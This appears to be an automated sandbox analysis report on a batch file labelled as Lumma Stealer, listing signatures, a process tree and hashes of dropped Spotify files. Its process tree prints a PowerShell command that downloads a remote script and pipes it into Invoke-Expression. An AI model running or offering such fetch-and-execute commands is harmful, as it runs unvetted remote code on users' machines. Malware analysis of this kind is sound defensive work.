Analysis

  • max time kernel
    73s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-03-2023 08:58

General

  • Target

    Install_Auto.bat

  • Size

    492B

  • MD5

    e811b616f7c5dcbbd9d48d91c605a11e

  • SHA1

    9a4b0fe213a789b54f559bd0dda3649738f72716

  • SHA256

    7d4f17d9c4809e6a6874e11c484f6c6b3b966dd5a33f9f09d9d3a3d600b4e355

  • SHA512

    57f9c415fe3f3cf35075c3c768175258719a2ea4345391c30a35bbc088fa856494079bf8cbaeea18f93f0b8ee39e7f4da4d68e59540a3d5e9e98f024181addc3

Score
10/10

Malware Config

Signatures

  • Lumma Stealer

    An infostealer written in C++ first seen in August 2022.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Install_Auto.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4204
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "&{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12}; """"& { $((Invoke-WebRequest -UseBasicParsing 'https://raw.githubusercontent.com/amd64fox/SpotX/main/Install.ps1').Content)} -confirm_uninstall_ms_spoti -confirm_spoti_recomended_over -podcasts_off -cache_off -block_update_on -start_spoti -new_theme -adsections_off -lyrics_stat spotify """" | Invoke-Expression"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:5032
      • C:\Windows\system32\curl.exe
        "C:\Windows\system32\curl.exe" -V
        3⤵
          PID:3684
        • C:\Windows\system32\curl.exe
          "C:\Windows\system32\curl.exe" -s -w %{http_code} -o /dev/null https://download.scdn.co/upgrade/client/win32-x86/spotify_installer-1.2.6.863.ge7902f05-163.exe --retry 2 --ssl-no-revoke
          3⤵
            PID:5116
          • C:\Windows\system32\curl.exe
            "C:\Windows\system32\curl.exe" https://download.scdn.co/upgrade/client/win32-x86/spotify_installer-1.2.6.863.ge7902f05-163.exe -o C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe --progress-bar --retry 3 --ssl-no-revoke
            3⤵
              PID:4628
            • C:\Windows\explorer.exe
              "C:\Windows\explorer.exe" C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe
              3⤵
                PID:3284
              • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                "C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1344
                • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                  C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe --type=crashpad-handler /prefetch:7 --max-uploads=5 --max-db-size=20 --max-db-age=5 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Spotify\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Spotify\User Data" --url=https://crashdump.spotify.com:443/ --annotation=platform=win32 --annotation=product=spotify --annotation=version=1.2.6.863 --initial-client-data=0x460,0x464,0x468,0x43c,0x46c,0x69653a30,0x69653a40,0x69653a4c
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4520
                • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                  "C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe" --type=gpu-process --disable-d3d11 --log-severity=disable --user-agent-product="Chrome/109.0.5414.87 Spotify/1.2.6.863" --lang=en --user-data-dir="C:\Users\Admin\AppData\Local\Spotify\User Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Spotify\debug.log" --mojo-platform-channel-handle=1732 --field-trial-handle=1904,i,6478856733818592822,14103534736545854409,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:2
                  4⤵
                  • Executes dropped EXE
                  PID:3976
                • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                  "C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --log-severity=disable --user-agent-product="Chrome/109.0.5414.87 Spotify/1.2.6.863" --lang=en --user-data-dir="C:\Users\Admin\AppData\Local\Spotify\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Spotify\debug.log" --mojo-platform-channel-handle=3076 --field-trial-handle=1904,i,6478856733818592822,14103534736545854409,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                  4⤵
                    PID:4848
                  • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                    "C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="Chrome/109.0.5414.87 Spotify/1.2.6.863" --lang=en --user-data-dir="C:\Users\Admin\AppData\Local\Spotify\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Spotify\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=1904,i,6478856733818592822,14103534736545854409,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                    4⤵
                      PID:4208
                    • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                      "C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe" --type=renderer --log-severity=disable --user-agent-product="Chrome/109.0.5414.87 Spotify/1.2.6.863" --disable-spell-checking --user-data-dir="C:\Users\Admin\AppData\Local\Spotify\User Data" --first-renderer-process --log-file="C:\Users\Admin\AppData\Roaming\Spotify\debug.log" --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3972 --field-trial-handle=1904,i,6478856733818592822,14103534736545854409,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
                      4⤵
                        PID:1452
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                  1⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4708
                  • C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe
                    "C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe"
                    2⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:1588
                    • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                      Spotify.exe
                      3⤵
                      • Executes dropped EXE
                      PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
                  1⤵
                    PID:3904
                  • C:\Windows\system32\werfault.exe
                    werfault.exe /hc /shared Global\1bea06e7ec6747439670c9f025bda959 /t 3844 /p 3804
                    1⤵
                      PID:2900
                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                      1⤵
                        PID:2144

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Discovery

                      Query Registry

                      1
                      T1012

                      System Information Discovery

                      1
                      T1082

                      Command and Control

                      Web Service

                      1
                      T1102

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133230888233856215.txt
                        Filesize

                        76KB

                        MD5

                        40a3bfdbe8f5f9ce2ccb1b9e5bc64eef

                        SHA1

                        118d18bdd5f9e99dba89867f5aa9f1dfd5e63632

                        SHA256

                        ade8bb612d2fc4e155b67dbb2bf018ff24b41044ce7d5788e82f251286869f0c

                        SHA512

                        0f3f27c76ed7c429a49b9da12920cd55d24f55befcc9f7efccd94a64bfd9bbff13d6bd1b51e8ba41017f2b8cc47ddd91d72c159d828b75c385d7b1ce1ccab52f

                      • C:\Users\Admin\AppData\Local\Spotify\Browser\Code Cache\js\index-dir\the-real-index
                        Filesize

                        48B

                        MD5

                        66c993dde7727df719cd8afc4c958f78

                        SHA1

                        080a06123d8305c0652be2d04d1559f2b27d5d6b

                        SHA256

                        b379b51d0ef09d840fc93fd179e5bbbd49176c764ee0dc72f4840983334f222f

                        SHA512

                        3df90d3a71146bd53fb9ab81af7b1a73d1796720e14dec2c3ff447e4d9699907bdfbe63960fb61f5aaa146844df78d30356b976f422585cbb6570d51d24362bc

                      • C:\Users\Admin\AppData\Local\Spotify\Browser\Code Cache\js\index-dir\the-real-index
                        Filesize

                        96B

                        MD5

                        26a53b482fdd08e96832d322650e7e5a

                        SHA1

                        1f678203cac9b600e4621f7a81a850834876e33e

                        SHA256

                        01af409a7ca9f0871a24ca04b9e8195b8186776a26a1d0f170ab095f2037d411

                        SHA512

                        66848e2bfe4462b8c2bf47a77ccd8b88587edcf5f64d53b6ac9e34d163feb820bb458f1d8be7f860112d62e28c1a9008d9c805e8afc293acab2bb724d6bfe111

                      • C:\Users\Admin\AppData\Local\Spotify\Browser\Session Storage\MANIFEST-000001
                        Filesize

                        41B

                        MD5

                        5af87dfd673ba2115e2fcf5cfdb727ab

                        SHA1

                        d5b5bbf396dc291274584ef71f444f420b6056f1

                        SHA256

                        f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                        SHA512

                        de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                      • C:\Users\Admin\AppData\Local\Spotify\LocalPrefs.json
                        Filesize

                        687B

                        MD5

                        4a034fdd665fae660d8064722ea96a37

                        SHA1

                        f481b5ea5bc5dbcfd80057d0c9d1f675541ae017

                        SHA256

                        7a638685977f1b2c052c4740c29929003a5f3e8ff209ab6b8b949b22c05e7828

                        SHA512

                        33292326bda7558b8a1babe1b75ce386706b407220669203dce884dbd47bd109400939f29eb60e2596daa739f3f6a26a0ee176654d256e403f46c55b1bda8e75

                      • C:\Users\Admin\AppData\Local\Spotify\LocalPrefs.json~RFe581f2b.TMP
                        Filesize

                        484B

                        MD5

                        23487eb8eb3bb137328ae7bbed541103

                        SHA1

                        2d1382aab06ce904585f2c297fd478c0743244f8

                        SHA256

                        f5aff1b4f4afe0ee189dcc9a10c7faee7549b958e4e44aa786a4caafaccc563a

                        SHA512

                        8703591f4e782dc6489a495839ba1dc9b5381cb0316a092d037169f1c77d23a436f0b9538af6b5caf4dc22c1819cfe3b85f44695fe42feadce0c3c6acb62eb26

                      • C:\Users\Admin\AppData\Local\Spotify\User Data\Crashpad\settings.dat
                        Filesize

                        56B

                        MD5

                        2b14fd459b1ecc312f4ee806ff8efa49

                        SHA1

                        c9a8480ad27ac99c252589bfac970b0387c3230b

                        SHA256

                        6720b53fa7d01bf670991769fbee7df38b4d100739a323895e95f95561a86834

                        SHA512

                        6adb82b98151c3e56c03a8885e72512d858619f7dbcdf358cced43098a4a9ddc6ae38c0b4ec2927e8467a3b38d33fa8db8912a6830a74f4c1ef9e9c7ee019a6c

                      • C:\Users\Admin\AppData\Local\Spotify\public.ldb\000002.dbtmp
                        Filesize

                        16B

                        MD5

                        206702161f94c5cd39fadd03f4014d98

                        SHA1

                        bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                        SHA256

                        1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                        SHA512

                        0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                      • C:\Users\Admin\AppData\Local\Spotify\public.ldb\CURRENT
                        Filesize

                        16B

                        MD5

                        46295cac801e5d4857d09837238a6394

                        SHA1

                        44e0fa1b517dbf802b18faf0785eeea6ac51594b

                        SHA256

                        0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                        SHA512

                        8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                      • C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe
                        Filesize

                        83.7MB

                        MD5

                        ee1d13cf21498538ef56313571a382eb

                        SHA1

                        17e07380c4a01bc7ebbdf535040803ffd26b3072

                        SHA256

                        936a4774b2318bb99b6bf18606168bd593126f6a7ac8bc0590a2114abcff962a

                        SHA512

                        a494f7c3229f66effeae0b15c1e1ff18d79f61f7f05e9f2f750a4bb4ccc5052a75ae3f86373685851300e1f2041772b4aa57a2207b18ea9fa7f5c1760f37eb16

                      • C:\Users\Admin\AppData\Local\Temp\SpotX_Temp-2023-03-12_09-58-23\SpotifySetup.exe
                        Filesize

                        83.7MB

                        MD5

                        ee1d13cf21498538ef56313571a382eb

                        SHA1

                        17e07380c4a01bc7ebbdf535040803ffd26b3072

                        SHA256

                        936a4774b2318bb99b6bf18606168bd593126f6a7ac8bc0590a2114abcff962a

                        SHA512

                        a494f7c3229f66effeae0b15c1e1ff18d79f61f7f05e9f2f750a4bb4ccc5052a75ae3f86373685851300e1f2041772b4aa57a2207b18ea9fa7f5c1760f37eb16

                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u1qhuv4y.pd2.ps1
                        Filesize

                        60B

                        MD5

                        d17fe0a3f47be24a6453e9ef58c94641

                        SHA1

                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                        SHA256

                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                        SHA512

                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                      • C:\Users\Admin\AppData\Roaming\Spotify\Apps\login.spa
                        Filesize

                        1.5MB

                        MD5

                        84b75cb8dc2bc117456d0a8fdd610bec

                        SHA1

                        e2c1b332cf15ac14fb759ca5a7e1eedc4c7a11ff

                        SHA256

                        0a60138cad59f776e95d2f66c3bcd5dba35df9abf023c05a9a193dfd73597501

                        SHA512

                        a9abd5b020c4017e1ac085d4e896a1dc51fe36c931a014cdd929ba3a23e251cabd7740c56e1500ddb9dee3abfb184a3dd3a6f8997e478156e9b009f5c136e3bc

                      • C:\Users\Admin\AppData\Roaming\Spotify\Apps\xpui.spa
                        Filesize

                        1.9MB

                        MD5

                        f619d8a3ab966f9f164fb704a6cbe5f7

                        SHA1

                        c198b7d44200b97bca78dbb1000f91bc7244de9d

                        SHA256

                        40a691288fedf7c19df650dd16a6239a77fe0e99c5e37ebfca6ac7477821e280

                        SHA512

                        8796b4c13c05dfee1fc68002851699982b048b35068fd8fbb5e854837d3695d2749dee4f95b02c00b7921896db5425369944bbba7cdd3e5178ab31733dd034f3

                      • C:\Users\Admin\AppData\Roaming\Spotify\Apps\xpui.spa
                        Filesize

                        5.9MB

                        MD5

                        b66c3226a7722f6a8080d2af72b0e373

                        SHA1

                        d4d79193cb0e7a0d85e233b9fbc3d372902da929

                        SHA256

                        52adc159dfc4db8e1b86397790173316c21c7edf10856cb463f6a183a1183516

                        SHA512

                        4533840ee71f7528c275d6d088d7858d5b3b7fd75d229949e137dc366e1653eb2e4b9c7b56e215e9ad4039878dbfda3112a210f0b0069fd0a9b2782d7ed6cbf9

                      • C:\Users\Admin\AppData\Roaming\Spotify\D3DCompiler_47.dll
                        Filesize

                        3.9MB

                        MD5

                        a61b0e2ee70514a0802ebd27221e46ec

                        SHA1

                        82c41f5be3728a170b67c0ab11a8dda380f63bec

                        SHA256

                        20b6a01102436181491bdc5a5576b4cb373a4e4ba69b996667f005c923e97ca8

                        SHA512

                        06763ae3753d571933ebf1290fa467acd0285f7ca1311dfa596b50543c1e75c15568782dfa6d17a4e385dd132cb3fa6e1d08017f24f1c64f30eca241d515f78d

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        e3327176f9850823321de4dd6990c359

                        SHA1

                        90273ab6102d6dbe6880f6174d49dc31ff94c495

                        SHA256

                        aa1015d6d66632a7d174b94a4edd5efc6ee3c05b70bbe41fc54efebf15e7a408

                        SHA512

                        fc6fc6397f2135b172e68df3221396b777f654c1d74f28e1f6778427f47b0549612fde28818516a66c2a1fdc050c9fa23f3aefd22bf69d6c012823d8c7efec9a

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        e3327176f9850823321de4dd6990c359

                        SHA1

                        90273ab6102d6dbe6880f6174d49dc31ff94c495

                        SHA256

                        aa1015d6d66632a7d174b94a4edd5efc6ee3c05b70bbe41fc54efebf15e7a408

                        SHA512

                        fc6fc6397f2135b172e68df3221396b777f654c1d74f28e1f6778427f47b0549612fde28818516a66c2a1fdc050c9fa23f3aefd22bf69d6c012823d8c7efec9a

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        14ccb3fe1910e32d99001498b693d0a8

                        SHA1

                        e040febb0efad69f1b403135f5f17f35ba91e274

                        SHA256

                        58258f71499338a64330e436408ebb30c207a10584721af1ec9d89cade012653

                        SHA512

                        bbe9f9d421248189b4fd49afda2b6bd88538bc8d4b6befa88f32f80d7bb7db6fdd159659ba72f4592197d93079fe45cf28d9d20aa6218367b1c3250dc7b63278

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\Spotify.exe
                        Filesize

                        18.9MB

                        MD5

                        18fb4b0a6815474d8d69c5a42bfc0442

                        SHA1

                        6ad644c196752cf13a63eb3a6be1a30054aa7fb9

                        SHA256

                        c6b5c780bb2cbbd2c5722fc47317ad97e25b9c3a40c1ea744522b5662519d374

                        SHA512

                        01818ca0ff5c11313733734cc48448e98c925e11cdcc014e21583b32de903e845b6a18cb21661b13abec1017c4490a63888a6d38f1ffe58ba7b4c7c1f4ce3469

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_100_percent.pak
                        Filesize

                        602KB

                        MD5

                        49b680f29dce483cc64217bd4f7ab041

                        SHA1

                        c59bfefc6fcc67ba21e53759ac21df8b5c73db52

                        SHA256

                        731a1eed1be98fa04deca38ce2ba2bdcf3d1cc52da38b8220158f408495b3448

                        SHA512

                        2beba850bcbcd56fadb41f347637e6270b87e83a33e2320a104ff9757f3a69410344ca5da82de9f76e4584e26b8887d8accf28a2fd279ab9f24c0eed5adef275

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_200_percent.pak
                        Filesize

                        900KB

                        MD5

                        8638b357b0000c74c853735fb13b5669

                        SHA1

                        da153a92a2fe9fb27b52eae7f9336cd0726dbe5e

                        SHA256

                        2036af7b3b89ff56bd296d4cc4c4f5060afefcb4d03af0ca76a12f557439c182

                        SHA512

                        fec84235339e621861f4d4dcc6a2a1fea3f0fda7973023fc7975f34921dc00451ebac343babc27050944dc94d5b471b46b0e81f47a8f855cd8ac19a0b1a45564

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\chrome_elf.dll
                        Filesize

                        1.1MB

                        MD5

                        64a636aa5e0b7bce79ab942d6fbe335a

                        SHA1

                        60880664b25f689717e930f9d1f17ef181ae9b54

                        SHA256

                        5ce864df595cd276ad564a4f2657940b5730b49bb03d982bbeaba9bcd067b65a

                        SHA512

                        df0c993a125c2ae1f235f551a5d41cb918117a140958b73243a95d99279ef43cfd07efcd6fa61fe2e707644098eb402e81a2ab1b033cd6289261747f26e80053

                      • C:\Users\Admin\AppData\Roaming\Spotify\crash_reporter.cfg
                        Filesize

                        654B

                        MD5

                        89b08983c9043e48fbce62a36422a727

                        SHA1

                        98169669a31d3840c4acb8efa280938201273334

                        SHA256

                        6a7eea2682c19c4da0a7a96a8bf03b0ddc4e57e8a1a797626d972380000f179b

                        SHA512

                        ad748b7ec0ce6efd89018e830b84960eee8ac85ae100950c85f1e192e8b3de15685328c7e49a0ca99b53ce62316619dd1d929eef321608448069eec938cbb6a8

                      • C:\Users\Admin\AppData\Roaming\Spotify\d3dcompiler_47.dll
                        Filesize

                        3.9MB

                        MD5

                        a61b0e2ee70514a0802ebd27221e46ec

                        SHA1

                        82c41f5be3728a170b67c0ab11a8dda380f63bec

                        SHA256

                        20b6a01102436181491bdc5a5576b4cb373a4e4ba69b996667f005c923e97ca8

                        SHA512

                        06763ae3753d571933ebf1290fa467acd0285f7ca1311dfa596b50543c1e75c15568782dfa6d17a4e385dd132cb3fa6e1d08017f24f1c64f30eca241d515f78d

                      • C:\Users\Admin\AppData\Roaming\Spotify\icudtl.dat
                        Filesize

                        10.0MB

                        MD5

                        76bef9b8bb32e1e54fe1054c97b84a10

                        SHA1

                        05dfea2a3afeda799ab01bb7fbce628cacd596f4

                        SHA256

                        97b978a19edd4746e9a44d9a44bb4bc519e127a203c247837ec0922f573449e3

                        SHA512

                        7330df8129e7a0b7b3655498b2593321595ec29445ea193c8f473c593590f5701eb7125ff6e5cde970c54765f9565fa51c2c54af6e2127f582ab45efa7a3a0f6

                      • C:\Users\Admin\AppData\Roaming\Spotify\libEGL.dll
                        Filesize

                        374KB

                        MD5

                        82c4112ee87d49dddb2914a893d3606c

                        SHA1

                        8d27b085db1dc340605e350c68759a15c2378c9a

                        SHA256

                        90348cdb7672c285b26bd1fa24ca95713c9d5768b3b1c87719f27422ac13b00c

                        SHA512

                        b175972274ec9e91a620442b3abb7f2de207980c6a9a857026e1abb42bb8515c0784a6cffffa49937bbd0dcf689baa171e66725d218cc227b44b9fb1c895eb01

                      • C:\Users\Admin\AppData\Roaming\Spotify\libGLESv2.dll
                        Filesize

                        6.3MB

                        MD5

                        8819371e2e93ee94ff5993d4396e96eb

                        SHA1

                        c9a84c4af01435e28e7754d279ec2983ff56d20a

                        SHA256

